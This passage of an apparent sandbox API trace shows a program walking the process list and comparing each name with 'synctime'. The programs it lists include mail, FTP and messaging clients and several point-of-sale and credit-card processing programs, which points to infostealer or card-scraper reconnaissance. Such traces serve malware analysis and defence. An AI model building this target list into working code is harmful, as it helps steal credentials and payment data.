lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.199] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3567310 [0093.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3567310, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0093.200] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0093.200] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="synctime") returned 0x0 [0093.200] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0093.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0093.201] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35476f8 [0093.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x35476f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0093.201] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0093.201] StrStrIA (lpFirst="icq.exe", lpSrch="synctime") returned 0x0 [0093.201] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0093.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.202] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3567f98 [0093.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3567f98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0093.202] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0093.202] StrStrIA (lpFirst="leechftp.exe", lpSrch="synctime") returned 0x0 [0093.202] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0093.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.205] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3567ff8 [0093.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3567ff8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0093.205] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0093.205] StrStrIA (lpFirst="ncftp.exe", lpSrch="synctime") returned 0x0 [0093.205] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0093.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.206] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567fb0 [0093.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3567fb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0093.206] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0093.206] StrStrIA (lpFirst="notepad.exe", lpSrch="synctime") returned 0x0 [0093.206] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0093.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.207] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3567fc8 [0093.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3567fc8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0093.207] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0093.207] StrStrIA (lpFirst="operamail.exe", lpSrch="synctime") returned 0x0 [0093.207] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0093.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.209] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568010 [0093.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x3568010, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0093.209] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0093.209] StrStrIA (lpFirst="outlook.exe", lpSrch="synctime") returned 0x0 [0093.209] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0093.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.210] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3567d58 [0093.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3567d58, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0093.210] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0093.210] StrStrIA (lpFirst="pidgin.exe", lpSrch="synctime") returned 0x0 [0093.210] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0093.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.211] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3567da0 [0093.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3567da0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0093.211] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0093.211] StrStrIA (lpFirst="scriptftp.exe", lpSrch="synctime") returned 0x0 [0093.211] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0093.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.213] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3567e78 [0093.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3567e78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0093.213] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0093.213] StrStrIA (lpFirst="skype.exe", lpSrch="synctime") returned 0x0 [0093.213] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0093.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.214] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3567e00 [0093.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3567e00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0093.214] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0093.214] StrStrIA (lpFirst="smartftp.exe", lpSrch="synctime") returned 0x0 [0093.214] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0093.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.216] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3567ea8 [0093.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3567ea8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0093.216] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0093.216] StrStrIA (lpFirst="thunderbird.exe", lpSrch="synctime") returned 0x0 [0093.216] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0093.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.217] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3567e18 [0093.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3567e18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0093.217] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0093.217] StrStrIA (lpFirst="totalcmd.exe", lpSrch="synctime") returned 0x0 [0093.217] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0093.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.219] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3567e30 [0093.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3567e30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0093.219] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0093.219] StrStrIA (lpFirst="trillian.exe", lpSrch="synctime") returned 0x0 [0093.219] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0093.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.220] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3567e60 [0093.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3567e60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0093.220] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0093.220] StrStrIA (lpFirst="webdrive.exe", lpSrch="synctime") returned 0x0 [0093.220] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0093.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.259] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3567e48 [0093.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3567e48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0093.259] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0093.259] StrStrIA (lpFirst="whatsapp.exe", lpSrch="synctime") returned 0x0 [0093.259] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0093.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.260] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3567e90 [0093.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3567e90, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0093.260] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0093.260] StrStrIA (lpFirst="winscp.exe", lpSrch="synctime") returned 0x0 [0093.261] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0093.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.262] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35672b0 [0093.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x35672b0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0093.262] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0093.262] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="synctime") returned 0x0 [0093.262] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0093.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0093.263] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x35671f0 [0093.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x35671f0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0093.263] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0093.263] StrStrIA (lpFirst="active-charge.exe", lpSrch="synctime") returned 0x0 [0093.263] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0093.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.264] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567ec0 [0093.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3567ec0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0093.265] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0093.265] StrStrIA (lpFirst="accupos.exe", lpSrch="synctime") returned 0x0 [0093.265] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0093.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.266] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3568280 [0093.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3568280, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0093.266] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0093.266] StrStrIA (lpFirst="afr38.exe", lpSrch="synctime") returned 0x0 [0093.266] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0093.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.267] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568088 [0093.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3568088, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0093.267] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0093.267] StrStrIA (lpFirst="aldelo.exe", lpSrch="synctime") returned 0x0 [0093.267] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0093.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0093.269] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3568028 [0093.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3568028, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0093.269] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0093.269] StrStrIA (lpFirst="ccv_server.exe", lpSrch="synctime") returned 0x0 [0093.269] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0093.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 